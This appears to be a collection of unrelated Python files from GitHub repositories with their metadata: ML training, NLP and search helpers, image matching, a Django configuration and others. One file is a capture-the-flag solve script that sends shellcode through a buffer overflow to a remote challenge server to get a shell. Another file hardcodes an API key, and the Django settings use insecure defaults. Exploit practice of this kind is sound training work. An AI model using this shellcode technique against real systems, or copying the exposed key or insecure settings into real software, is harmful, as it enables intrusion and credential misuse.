paser.add_argument('--epochs', type=int, default=10, help='number of epochs')
paser.add_argument('--lr', type=float, default=0.001, help='learning rate')
paser.add_argument('--arch', type=str, default='vgg16', help='type of model architecture to be used')
paser.add_argument('--hidden_units', type=int, default=512, help='hidden units for classifier/Network layer')
paser.add_argument('--checkpoint', type=str, default='checkpoint.pth', help='save trained model to a file')
args = paser.parse_args()
#device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
#model.to(device);
is_gpu = args.gpu
use_cuda = torch.cuda.is_available()
device = torch.device("cpu")
if is_gpu and use_cuda:
device = torch.device("cuda:0")
print(f"Device set to {device}")
else:
device = torch.device("cpu")
print(f"Device set to {device}")
dataloaders_train, dataloaders_valid, dataloaders_test, image_datasets_train, image_datasets_valid, image_datasets_test = process_data(args.data_dir)
model = pretrained_model(args.arch)
for param in model.parameters():
param.requires_grad = False
classsifier, model.classifier = classifier(model, args.hidden_units)
criterion = nn.NLLLoss()
optimizer = optim.Adam(model.classifier.parameters(), lr = args.lr)
model = train_model(args.epochs, dataloaders_train, dataloaders_valid, device, model, optimizer, criterion)
test_network(model, dataloaders_test, device, criterion)
save_checkpoint(model, image_datasets_train, args.checkpoint, args.arch, args.epochs)
print('Done')
| [
"noreply@github.com"
] | A-Nuru.noreply@github.com |
26f153d845a72b60f17dd0f6548f21fd4e613a28 | c9ec4dca0bb6b487f09b8f62ce175b303302e4ab | /Python Scripts/TextProcess.py | 2e9bba5119b21394c3e2538810404102d2b6c35f | [] | no_license | dr-jgsmith/orphans | 92c49ec671b62264369a004f2875ba6f0f8224dd | d0dc6c6cfd9515cff8eaa98ea2a5d291368cd077 | refs/heads/master | 2021-01-20T08:06:21.519660 | 2017-05-13T07:14:53 | 2017-05-13T07:14:53 | 90,094,102 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,070 | py | # -*- coding: utf-8 -*-
"""
seed_search
Created on Tue Nov 22 01:10:08 2016
@author: smith
"""
import os
import csv
import requests
import json
import numpy as np
from textblob import TextBlob
import networkx as nx
from bitarray import bitarray
import nltk, re
from gensim import corpora, models, similarities
import scholarly
import wikipedia
import matplotlib.pyplot as plt
from itertools import tee
from collections import defaultdict
from pprint import pprint
class TextProcessor:
def __init__(self):
self.sentList = []
self.corp = []
self.com_seq = []
self.edges = []
self.bin_set = []
self.text_sdr = []
self.stage = []
self.stop_list = ['for', 'a', 'the', 'to', 'too', '"drop', 'in', 'but', 'am', 'ie', 'i.e.', 'of', 'I', ']', '[', '...', '–', '-', '____', '___', ',' , '+', '/w', '>']
self.alphabet = []
def getFileType(self, filename):
self.filename = filename
self.filepath, self.file_extension = os.path.splitext(self.filename)
return self.file_extension
def tag_text(self, text):
self.text = text
t = TextBlob(self.text)
self.seq2 = [k[0].lemmatize().lower() for k in t.tags if k[0] not in self.stop_list if len(k[0]) > 2]
self.test = ' '.join(self.seq2)
self.r = TextBlob(self.test)
self.sentence = self.r.tags
self.sentList.append(self.sentence)
return self.sentList
def np_chunker(self):
self.grammar = """
NP: {<N.+>?<J.+>?<V.+>*<N.+>+}
"""
cp = nltk.RegexpParser(self.grammar)
self.result = cp.parse(self.sentence)
for i in self.result:
self.seq = []
print("Printing i: ", i)
for j in i:
print("Printing j: ",j[0])
self.seq.append(j[0])
self.com_seq.append(self.test)
self.com_seq.append(self.seq)
self.trans_doc = [x for x in self.com_seq if len(x[0]) > 2]
print(self.trans_doc)
return self.trans_doc
def sparse_vec(self):
self.frequency = defaultdict(int)
for text in self.trans_doc:
print("Printing... ", text)
self.dictionary = corpora.Dictionary(self.trans_doc)
self.dictionary.save('data_dump.dic')
self.dictionary.token2id
self.corpus = [self.dictionary.doc2bow(text) for text in self.trans_doc]
def word2sdr(self):
for i in self.trans_doc:
for j in i:
self.bi = ''.join('{0:064b}'.format(ord(x), 'b') for x in j)
print(j, self.bi)
self.x = np.binary_repr(self.bi)
print(self.x)
self.bin_set.append(self.bi)
def genet_sem(self):
for i in self.trans_doc:
for j in i:
self.bin_letter = ' '.join('{0:064b}'.format(ord(x), 'b') for x in j)
print(self.bin_letter)
def text2sdr(self):
j = self.bin_set
x = int(j[0])
y = int(j[1])
print(x, y)
merge = x&y
print(merge)
#pprint(self.union)
def convenrt2bit(self):
a = bitarray()
for i in self.trans_doc:
for j in i:
self.n = j + ' '
a.fromstring(self.n)
print(self.n, a)
def learnAlphaB(self):
a = bitarray()
for i in self.trans_doc:
for j in i:
split = list(j)
for x in split:
print(x)
a.fromstring(x)
self.spr_l = dok_matrix(a)
print(self.spr_l)
break
def lda_model(self, topics):
self.topics = topics
self.lda = models.LdaModel(self.corpus, id2word=self.dictionary, num_topics=self.topics)
self.corp_lda = self.lda[self.corpus]
for doc in self.corp_lda:
print(doc)
print(self.lda.print_topics(self.topics))
#Edges will be very important as the will direct co-occurence in documents fingerprints
def get_edges(self):
for j in self.trans_doc:
a, b = tee(j)
next(b, None)
self.pairs = zip(a, b)
for i in self.pairs:
print(i)
self.edges.append(i)
def get_edge_graph(self):
G = nx.DiGraph()
G.add_edges_from(self.edges)
#nx.draw(G, with_labels=True)
nx.draw_spring(G,node_size=1, with_labels=True, edge_color='b',alpha=.2,font_size=10)
plt.show()
def get_path_graph(self):
G = nx.DiGraph()
for j in self.trans_doc:
G.add_path(j)
#nx.draw(G, with_labels=True)
nx.draw_spring(G,node_size=0,with_labels=True,edge_color='b',alpha=.2,font_size=10)
plt.show()
class TextSearch:
def __init__(self, term):
self.term = term
def search_scholar(self):
search_query = scholarly.search_pubs_query(self.term)
self.result = next(search_query).fill()
print(self.result)
def search_news(self):
for item in self.term:
base = "http://www.faroo.com/api?q="
connector = "&start=1&length=10&l=en&src=news&f=json"
api_key = "&key=NWPsWfgdnoKG8KLL56rzN8Zosbk_"
search = base+self.term+connector+api_key
r = requests.get(search)
self.news_text = r.text
if self.news_text == "<h1>HTTP/1.1 429 Rate limit exceeded</h1>":
pass
else:
print(self.news_text)
self.news = json.loads(self.news_text)
print(self.news)
for i, entry in enumerate(self.news['results']):
print(entry['title'])
def search_web(self):
for item in self.term:
base = "http://www.faroo.com/api?q="
connector = "&start=1&length=10&l=en&src=web&f=json"
api_key = "&key=NWPsWfgdnoKG8KLL56rzN8Zosbk_"
search = base+self.term+connector+api_key
r = requests.get(search)
#self.web_text = str(r.content, 'cp437', errors='ignore')
self.web_text = r.text
if self.web_text == "<h1>HTTP/1.1 429 Rate limit exceeded</h1>":
pass
else:
print(self.web_text)
self.web = json.loads(self.web_text)
print(self.web)
for i, entry in enumerate(self.web['results']):
print(entry['title'])
def search_wiki(self):
self.summary = wikipedia.summary(self.term)
print(self.summary)
return self.summary
def recurse_search(self, depth):
self.depth = depth
#Basic usage:
s = TextSearch("climate change")
#Define where to search, i.e. wikipedia, google scholar, news, etc.
text = s.search_wiki()
data = TextProcessor()
data.tag_text(text)
data.np_chunker()
data.get_edges()
data.get_path_graph()
"""
data.get_edges()
data.get_graph()
start project
search by topic
Get doc list
Save metadata to db - including url
retrieve url
convert document into raw text
process text
retrieve word/sequence list
elif self.file_extension == '.pdf':
parsePDF()
elif self.file_extension == '.csv':
parseDOC()
elif self.file_extension == '.html':
parseHTML()
"""
| [
"justin.smith@directharvest.io"
] | justin.smith@directharvest.io |
066fe43ee93544352a40330172dc00d56e591351 | e4477741d0f1457a0eb3835766e89c7c39b47c81 | /sandbox_2.py | aba6b6a976390a62ffa5f69dbcf789aab2bb703d | [] | no_license | wtnbKAZUFUMI/imageSimulation | 79a176bd2e26c38d2be86afdf97a144d8b3862b1 | 72cb66ca8fbac186e74d6cfc1bcfa16d9726aac6 | refs/heads/master | 2021-01-19T14:52:34.426100 | 2017-08-25T11:26:41 | 2017-08-25T11:26:41 | 100,933,361 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,091 | py |
import os
import pyfits
import cv2
import matplotlib.pyplot as plt
import numpy
import math
import random
dataset_dir = "../results/convolution/000/longExposure/"
target_number = 971
def loadDataSet(dataset_dir):
dataset_files_list = os.listdir(dataset_dir)
if ".DS_Store" in dataset_files_list:
dataset_files_list.remove(".DS_Store")
dataset = [cv2.imread(dataset_dir + file , cv2.IMREAD_GRAYSCALE) for file in dataset_files_list]
return dataset
def errorListFromSADMethod(dataset , data):
error = [numpy.abs(data - dataset_element) for dataset_element in dataset]
sumed_error = [i.sum() for i in error]
return sumed_error
def MyerrorListFromSADMethod(dataset , data):
#print data.tolist()
error = [numpy.abs(data - dataset_element) for dataset_element in dataset]
sumed_error = [i.sum() for i in error]
data_sum = data.sum()
sumed_error_dived = [float(i)/data_sum for i in sumed_error]
return sumed_error_dived
def errorListFromSSDMethod(dataset , data):
error = [numpy.abs(data - dataset_element) for dataset_element in dataset]
powed_error = [math.pow(i.sum(),2) for i in error]
return powed_error
def errorListFromNCCMethod(dataset, data):
error = [numpy.multiply(dataset_element,data).sum()/(math.sqrt(numpy.multiply(dataset_element,dataset_element).sum()) * math.sqrt(numpy.multiply(data,data).sum())) for dataset_element in dataset]
error_alt = [i if not math.isnan(i) else 0.0 for i in error]
return error_alt
def errorListFromZNCCMethod(dataset, data):
m = data.shape[0]
n = data.shape[1]
error = [(m*n*numpy.multiply(dataset_element,data).sum() - dataset_element.sum()*data.sum())/math.sqrt((m*n*numpy.multiply(dataset_element,dataset_element).sum() - math.pow(dataset_element.sum(),2)) * (m*n*numpy.multiply(data,data).sum() - math.pow(data.sum(),2))) for dataset_element in dataset]
for ind,val in enumerate(error):
if val > 1.0:
print str(ind) + " : " + str(val)
error_alt = [i if not math.isnan(i) else 0.0 for i in error]
return error_alt
def errorListFromSIFTMethod(dataset, data):
sift = cv2.SIFT()
kp_1, des_1 = sift.detectAndCompute(dataset[500], None)
kp_2, des_2 = sift.detectAndCompute(data, None)
matcher = cv2.DescriptorMatcher_create("FlannBased")
matches = matcher.match(des_1,des_2)
def errorListFromLuminance(dataset, data):
error = [abs(float(data.sum()) - float(dataset_element.sum())) for dataset_element in dataset]
#print error
return error
def makeRankList(error_list):
error_sorted = sorted(error_list)
error_li = list(set(error_sorted))
ans = []
for i in error_li:
for ind, val in enumerate(error_list):
if i == val:
ans.append(ind)
#print ans
return ans
def eliteSelect(error_sad, tolerance_ratio = 1.0):
elite = []
for ind , val in enumerate(error_sad):
if val <= tolerance_ratio:
elite.append(ind)
return elite
def chrVector(error_mysad_elite , error_zncc_elite):
return [numpy.array([error_mysad_elite[i] , error_zncc_elite[i]]) for i in range(len(error_mysad_elite))]
def proto_chrVector(error_mysad_elite , error_zncc_elite , elite , target_number):
target = numpy.array([error_mysad_elite[elite.index(target_number)] , error_zncc_elite[elite.index(target_number)]])
return [numpy.array([error_mysad_elite[i] , error_zncc_elite[i]]) - target for i in range(len(error_mysad_elite))]
def ranking(mag, elite):
mag_sorted_set = sorted(set(mag))
#print mag_sorted_set
ind_mag = []
for i in mag_sorted_set:
for ind,val in enumerate(mag):
if i == val:
ind_mag.append(ind)
ans = []
for i in ind_mag:
for ind,val in enumerate(elite):
if i == ind:
ans.append(val)
return ans
def rankToDeg(rank):
delta_deg = 36
ans = []
for i in rank:
a = (i/100) * delta_deg
b = (i%100)/10 * delta_deg
c = ((i%100)%10) * delta_deg
numpy.array([a, b, c])
ans.append(numpy.array([a, b, c]))
return ans
def degs3DPlot(degs):
degs = degs[0:100:1]
x = [deg[0] for deg in degs]
y = [deg[1] for deg in degs]
z = [deg[2] for deg in degs]
plt.subplot(121)
plt.scatter(x, y)
plt.subplot(122)
plt.scatter(x, z)
plt.show()
def nccTest(im_1, im_2):
#im_1 = numpy.array([[1,2,3],[4,5,6],[7,8,9]])
#im_1 = numpy.array([[9,8,7],[6,5,4],[3,2,1]])
#im_2 = numpy.array([[9,8,7],[6,5,4],[3,2,1]])
#print (im_1 * im_2).tolist()
#print numpy.sum(im_1 * im_2)
im_1 = numpy.array(im_1.tolist())
im_2 = numpy.array(im_2.tolist())
print im_1
print im_2
a = numpy.sum(im_1 * im_2)
b = numpy.sum(im_1 * im_1)
print b
c = numpy.sum(im_2 * im_2)
print c
d = math.sqrt(b*c)
print d
err = a/d
print err
def sadTest(im_1, im_2):
im_1 = numpy.array(im_1.tolist())
im_2 = numpy.array(im_2.tolist())
print im_1
print im_2
print im_1 - im_2
print numpy.abs(im_1 - im_2)
print numpy.sum(numpy.abs(im_1 - im_2))
dataset = loadDataSet()
member = range(len(dataset))
err = MyerrorListFromSADMethod(dataset, dataset[100])
#a = cv2.resize(dataset[3542] , (10 , 15))
#b = cv2.resize(dataset[971] , (10 , 15))
sadTest(a, b)
#print ZNCC(dataset[3542], dataset[971])
'''
dataset = loadDataSet()
member = range(len(dataset))
error_mysad = MyerrorListFromSADMethod(dataset , dataset[target_number])
error_sad = errorListFromSADMethod(dataset , dataset[target_number])
error_ssd = errorListFromSSDMethod(dataset , dataset[target_number])
error_ncc = errorListFromNCCMethod(dataset , dataset[target_number])
error_zncc = errorListFromZNCCMethod(dataset , dataset[target_number])
error_sift = errorListFromSIFTMethod(dataset , dataset[target_number])
error_luminance = errorListFromLuminance(dataset, dataset[target_number])
a = error_mysad
b = numpy.array(error_zncc)
elite = eliteSelect(error_mysad, tolerance_ratio = 1.0)
a = [a[i] for i in elite]
b = [b[i] for i in elite]
plt.scatter(a, b)
plt.show()
ch_vector = proto_chrVector(a , b , elite , target_number)
#for i in ch_vector:
# print i
mag = [abs(i[1]) for i in ch_vector]
#print mag
plt.plot(range(len(a)) , sorted(mag) , "o" , markersize=7)
plt.show()
rank = ranking(mag,elite)
#for i in rank:
# print (i)
# print error_zncc[i]
#degs = rankToDeg(rank)
#for i in degs:
# print i
#degs3DPlot(degs)
'''
| [
"31205208+wtnbKAZUFUMI@users.noreply.github.com"
] | 31205208+wtnbKAZUFUMI@users.noreply.github.com |
f846c2645161849b6c1e7ffa56c7225013e7d047 | 06c06465ef0b7c3e080859bf9c161155349a4d0c | /software/generatore_numeri_causaly.py | ae5f2e2f8c5f2806ce2aeec9366f9be629c1a451 | [] | no_license | Flecart/Olicyber2021 | e296ea54566c7912c939e4e1119b669cd6f37a32 | 3fb161a0ce8ce1c4269aae3290c5588ce621f638 | refs/heads/main | 2023-06-22T12:05:25.184420 | 2021-07-21T09:23:05 | 2021-07-21T09:23:05 | 388,059,404 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,261 | py | #! /usr/bin/env python3
# WRITEUP
# il programma della challenge genera un buffer di valore causale
# il problema e che mi ritorna l' indirizzo del buffer, che devo quindi eseguire
# in qualche modo
# allora io mi carico tutto e per tutti gli indirizzi in cui puo saltare gli mando
# lindirizzo in cui si trova la shell, quindi 125 posizioni possibili tutte portano alla shell
# sono quasi sicuro che quando salta vada alla shell quindi e fatta
from pwn import *
processo = ELF('./generatore_poco_casuale')
# conn = process(processo.path)
conn = remote('gpc.challs.olicyber.it',10104)
context.terminal = ['terminator', '-e']
# gdb.attach(conn, """
# b *0x00101257
# c
# """)
shell = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
conn.recvuntil('casuale: ')
stack = int(conn.recvline().strip().decode())
conn.recvline()
print(stack)
local_28 = p64(stack)
exploit = p64(stack + 1)
payload = b's'+ shell+ b'\x00'*4 + exploit *140
# sleep(1)
conn.sendline(payload)
print(payload)
conn.sendline('s') # non so perche devo inviare di nuovo s, ma funziona
conn.interactive()
# flag{pr3nd1_1l_c0ntr0ll0_d4_un_1nd1r1zz0}
# with open('/tmp/prova.txt', 'wb') as f:
# f.write(payload)
| [
"huangelo02@gmail.com"
] | huangelo02@gmail.com |
16b33380593d3b19adac35f8065445f8e0af71b0 | b55c72bc94c6464a1b4461a3d11051f7dce98cd4 | /source/053.py | 37a6c46efa8ba1390c36fdc1702d16b756abdb8e | [] | no_license | ilkerkesen/euler | d886a53d3df3922e4ddaff6ab9b767e547c0eca2 | b9e54412492cfcee9dbf5a017cf94e5da65ad0d3 | refs/heads/master | 2020-05-21T12:49:31.939194 | 2016-08-14T17:25:17 | 2016-08-14T17:25:17 | 6,717,398 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 469 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from operator import mul
LIMIT = 1000000
def ncr(n, r):
r = min(r, n-r)
if r == 0:
return 1
numer = reduce(mul, range(n, n-r, -1))
denom = reduce(mul, range(1, r+1))
return numer / denom
def main():
result = 0
for n in range(1, 101):
for r in range(n+1):
if ncr(n, r) > LIMIT:
result += 1
print result
if __name__ == "__main__":
main()
| [
"ilkerksn@gmail.com"
] | ilkerksn@gmail.com |
56283c8a9ba0b97fe7da7b90c3b70341a3176af6 | 56e694eccce264be2d6b789bccaac4cf5326be8e | /cython/demoforroot.py | 1bf9cb0095d843410442f2fc76bc30219c5bf0a8 | [] | no_license | kanouyou/CometQuenchCode- | cddb56b6d6017435afa3183f2ff6d834395c448c | aaa2cb3af3da776eac04be39a537ae51b1beae1d | refs/heads/master | 2020-05-21T16:27:35.639423 | 2017-04-07T09:07:35 | 2017-04-07T09:07:35 | 64,641,031 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,658 | py | #!/usr/bin/env python
import os
import sys
sys.path.append("/home/yeyang/Documents/software/CometQuenchCode-/cython")
import matplotlib.pyplot as plt
import XPostRootLoad as pt
import XPostOutput
import XRootFiles
def usage():
print "usage:"
print " /path/demoforroot -m magnet -g geofile -d datafile"
def Draw(ax, geofile, datafile, magnet, Tmin, Tmax):
plot = pt.XPost2dPlot(geofile, datafile, magnet)
plot.SetMatInfo(pt.kTemperature)
#plot.SetMatInfo(pt.kVoltage)
plot.SetDirection(pt.kZ)
plot.SetPhi(1)
#plot.SetColorMap("nipy_spectral")
#plot.SetColorMap("rainbow")
plot.SetRange(Tmin, Tmax)
plot.DrawThis(ax)
ax.set_title(magnet)
if __name__=="__main__":
magnet = ["CS0", "CS1", "MS1", "MS2"]
geofile = ["geo%s.dat" %magnet[0], "geo%s.dat" %magnet[1], "geo%s.dat" %magnet[2], "geo%s.dat" %magnet[3]]
datafile = sys.argv[1]
rfile = XRootFiles.XRootFiles(datafile)
rfile.SetSubDirectory(magnet)
Tmax = rfile.FindMaxTemp()
Tmin = rfile.FindMinTemp()
path = os.path.abspath(os.getcwd()+"/output")
out = XRootFiles.XRootOutput(path)
out.SetCoilPosition("CS1", 24, 1, 2)
out.ConstructFigure()
out.Plot("T")
plt.show()
fig, ax = plt.subplots(2, 2, figsize=(12,6))
for i in range(len(magnet)):
Draw(ax[i/2][i%2], geofile[i], datafile, magnet[i], Tmin, Tmax)
plt.tight_layout()
#plt.savefig("temp.pdf")
plt.show()
"""
plot = pt.XPost2dPlot(geofile, datafile, magnet)
plot.SetMatInfo(pt.kTemperature)
plot.SetDirection(pt.kZ)
plot.SetPhi(1)
plot.SetRange(4.5, maxi)
plot.Draw()
"""
| [
"kanouyou@kune2a.nucl.kyushu-u.ac.jp"
] | kanouyou@kune2a.nucl.kyushu-u.ac.jp |
fede69e240d8da8f2e4e2f83df931bcd50f79606 | 4b12c5460583f445e0a4d8ac1ecc5b245d8ea3e3 | /pms/access/cpd.py | 16773d166da4a15df29705b5418e9e2ef13985fb | [] | no_license | idksoftware/pms | b5fd7fe402785c4ad7586a22822d13310dd0b234 | f5a1bdf6c4febe81b501d1b50b3fdc85029c7be0 | refs/heads/master | 2020-06-25T12:45:07.940784 | 2019-09-12T16:33:44 | 2019-09-12T16:33:44 | 199,311,073 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,196 | py | '''
Created on Jan 28, 2014
@author: wzw7yn
'''
import sqlite3 as lite
import sys
from access.database import Database
from sqlbuilder import SqlSelectBuilder
from sqlbuilder import SqlInsertBuilder
from sqlbuilder import SqlUpdateBuilder
from sqlbuilder import SqlSingleWhereBuilder
class CPDTable(Database):
db_path = ""
'''
cpd_id integer primary key,
date_started datetime not null,
days_taken int ,
activity_type varchar(100),
category varchar(100),
core_cpd_module varchar(256),
description varchar(512),
learning_objectives varchar(512),
reflective_comments varchar(512),
attached_files varchar(512),
web_links varchar(512)
'''
IDX_CPD_ID = 0
IDX_TITLE = 1
IDX_DATE_STARTED = 2
IDX_DAYS_TAKEN = 3
IDX_ACTIVITY_TYPE = 4
IDX_CATEGORY = 5
IDX_CORE_CPD_MODULE = 6
IDX_DISCRIPTION = 7
IDX_LEARNING_OBJECTIVES = 8
IDX_REFLECTIVE_COMMENTS = 9
IDX_ATTACHED_FILES = 10
IDX_WEB_LINKS = 11
@staticmethod
def SetConfig(path):
CPDTable.db_path = path
def add(self,
title=None,
date_started=None,
days_taken=None,
activity_type=None,
category=None,
core_cpd_module=None,
description=None,
learning_objectives=None,
reflective_comments=None,
attached_files=None,
web_links=None,
):
builder = SqlInsertBuilder()
builder.addfield( title, "title");
builder.addfield( date_started , "date_started");
builder.addfield( days_taken , "days_taken");
builder.addfield( activity_type , "activity_type");
builder.addfield( category , "category");
builder.addfield( core_cpd_module , "core_cpd_module");
builder.addfield( description , "description");
builder.addfield( learning_objectives , "learning_objectives");
builder.addfield( attached_files , "attached_files");
builder.addfield( web_links , "web_links");
select = 'insert into cpd (' + builder.getTokenString() + ') values (' + builder.getValueString() + ');'
self.execcmd(select)
def update(self, cpd_id,
title=None,
date_started=None,
days_taken=None,
activity_type=None,
category=None,
core_cpd_module=None,
description=None,
learning_objectives=None,
reflective_comments=None,
attached_files=None,
web_links=None,
):
builder = SqlUpdateBuilder()
builder.addfield( cpd_id , "cpd_id");
builder.addfield( title, "title");
builder.addfield( date_started , "date_started");
builder.addfield( days_taken , "days_taken");
builder.addfield( activity_type , "activity_type");
builder.addfield( category , "category");
builder.addfield( core_cpd_module , "core_cpd_module");
builder.addfield( description , "description");
builder.addfield( learning_objectives , "learning_objectives");
builder.addfield( attached_files , "attached_files");
builder.addfield( web_links , "web_links");
select = 'update cpd set ' + builder.getValueString() + ' where cpd_id = \'%s\' ' % cpd_id + ';'
self.execcmd(select)
def singlewhere(self,
cpd_id=None,
title=None,
date_started=None,
days_taken=None,
activity_type=None,
category=None,
core_cpd_module=None,
description=None,
learning_objectives=None,
reflective_comments=None,
attached_files=None,
web_links=None,
):
builder = SqlSingleWhereBuilder()
builder.addfield( cpd_id , "cpd_id");
builder.addfield( title, "title");
builder.addfield( date_started , "date_started");
builder.addfield( days_taken , "days_taken");
builder.addfield( activity_type , "activity_type");
builder.addfield( category , "category");
builder.addfield( core_cpd_module , "core_cpd_module");
builder.addfield( description , "description");
builder.addfield( learning_objectives , "learning_objectives");
builder.addfield( attached_files , "attached_files");
builder.addfield( web_links , "web_links");
return builder.getValueString()
def selectcolstr(self,
cpd_id=None,
title=None,
date_started=None,
days_taken=None,
activity_type=None,
category=None,
core_cpd_module=None,
description=None,
learning_objectives=None,
reflective_comments=None,
attached_files=None,
web_links=None,
):
builder = SqlSelectBuilder()
builder = SqlSingleWhereBuilder()
builder.addfield( cpd_id , "cpd_id");
builder.addfield( title, "title");
builder.addfield( date_started , "date_started");
builder.addfield( days_taken , "days_taken");
builder.addfield( activity_type , "activity_type");
builder.addfield( category , "category");
builder.addfield( core_cpd_module , "core_cpd_module");
builder.addfield( description , "description");
builder.addfield( learning_objectives , "learning_objectives");
builder.addfield( attached_files , "attached_files");
builder.addfield( web_links , "web_links");
return builder.tostr()
def selectcols(self, payment_id=False,
cpd_id=False,
date_started=False,
days_taken=False,
activity_type=False,
category=False,
core_cpd_module=False,
description=False,
learning_objectives=False,
reflective_comments=False,
attached_files=False,
web_links=False
):
selectstr = self.selectcolstr(payment_id,
cpd_id,
date_started,
days_taken,
activity_type,
category,
core_cpd_module,
description,
learning_objectives,
reflective_comments,
attached_files,
web_links
)
if selectstr == None:
select = 'select * from cpd;'
else:
select = 'select ' + selectstr + ' from cpd;'
return self.execfetchall(select)
# obsolete
def select(self, selectStr, whereStr):
select = 'select %s' + selectStr + ' from cpd where %s ' % whereStr + ';'
return self.execfetchone(select)
def selectone(self, selectStr=None, whereStr=None):
select = self._selectstr('cpd', selectStr, whereStr)
return self.execfetchone(select)
def selectall(self, selectStr=None, whereStr=None):
select = self._selectstr('cpd', selectStr, whereStr)
return self.execfetchall(select)
def deleteall(self):
self._deleteall('cpd')
def get_id(self, cpd_id):
select = 'select cpd_id from payment where cpd_id = \'%s\' ' % cpd_id + ';'
return self.execfetchone(select)
def remove(self, idx):
self._remove('cpd', 'cpd_id', idx)
def showAll(self):
return self._showAll('cpd')
def showItem(self, pid):
return self._showItem('cpd', 'cpd_id', pid)
def getItem(self, idx, data):
return data[idx]
| [
"i.ferguson@idk.co.uk"
] | i.ferguson@idk.co.uk |
e31a886196bc0432da6784ea706d7553fc4bdc56 | cce3c60cab11c5744a7aead41fa62f2d4b4f7624 | /blog/blog/settings.py | 86d7e251dac8932a3fe2369c12d3fabd6c268e97 | [] | no_license | Krushel/latest_blog | 29e00f4f70a2e86a343e74dcc10f0c1be2a1e282 | c9430e5d3b5110e372620ad5b104b600605e855d | refs/heads/main | 2023-03-07T13:28:56.615062 | 2021-02-18T17:24:49 | 2021-02-18T17:24:49 | 340,168,489 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,672 | py | """
Django settings for blog project.
Generated by 'django-admin startproject' using Django 3.1.6.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import os
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'uf'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
STATICFILES_DIRS = [
BASE_DIR / "static"
]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'corsheaders',
'api'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
]
ROOT_URLCONF = 'blog.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'templates')
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'blog.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'postgres',
'USER': 'postgres',
'PASSWORD': 'postgres',
'HOST': 'db',
'PORT': 5432,
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
REST_FRAMEWORK = {
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
)
}
CORS_ALLOWED_ORIGINS = [
"https://example.com",
"https://sub.example.com",
"http://localhost:3000",
"http://127.0.0.1:5000",
"http://127.0.0.1:8000"
]
LOGIN_REDIRECT_URL = "/" | [
"you@example.com"
] | you@example.com |
047b5e5d2ea0b028059c1b2434d27f5f430e8434 | bb7668267448d1895c423566aa575b22274efde2 | /blog/migrations/0006_auto_20171016_2003.py | fa99817019f7a4d9f462cc929f5e7d982d21c365 | [] | no_license | StarfishM/my-first-blog | 1b7dd3931d50d3bd8c7d532180a4f63918bc5023 | 3fdc056fb4870945052356996017b0e374f6374d | refs/heads/master | 2022-12-10T12:24:40.143317 | 2021-10-07T07:59:06 | 2021-10-07T07:59:06 | 94,611,553 | 1 | 0 | null | 2022-11-22T08:48:33 | 2017-06-17T08:45:06 | Python | UTF-8 | Python | false | false | 535 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-10-16 18:03
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0005_auto_20171003_1533'),
]
operations = [
migrations.DeleteModel(
name='Image',
),
migrations.AddField(
model_name='post',
name='image',
field=models.ImageField(null=True, upload_to='img/%Y/%m/%d'),
),
]
| [
"merle_canada@hotmail.com"
] | merle_canada@hotmail.com |
